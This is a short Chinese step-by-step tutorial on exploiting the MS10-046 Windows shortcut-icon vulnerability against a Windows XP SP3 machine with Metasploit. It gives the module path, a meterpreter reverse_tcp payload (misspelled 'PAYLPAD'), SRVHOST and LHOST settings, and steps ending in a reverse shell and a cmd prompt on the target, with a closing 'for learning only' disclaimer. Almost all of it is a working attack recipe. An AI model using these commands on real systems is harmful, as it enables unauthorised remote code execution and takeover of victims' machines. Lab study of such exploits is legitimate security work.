如果被攻击者显示特指的快捷方式图标或者使用特制的共享时,则该漏洞可能允许远程执行代码。成功利用漏洞的攻击者可以获得与本地用户相同的用户权限。
工具/原料
1
Metasploit
2
windows XP SP3
准备阶段
1
获取攻击方IP
2
获取入侵方IP
3
互相ping通
Metasploit使用
1
Metasploit打开
2
找到漏洞模块
3
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
4
set PAYLPAD windows/meterpreter/reverse_tcp
5
set SRVHOST 192.168.88.227set LHOST 192.168.88.227
使用最后阶段
1
exploit
2
建立共享连接
3
回弹
4
查看连接
5
进入cmd
6
拿到shell
注意事项
1
本知识只做学习使用
2
如果对您有用请点赞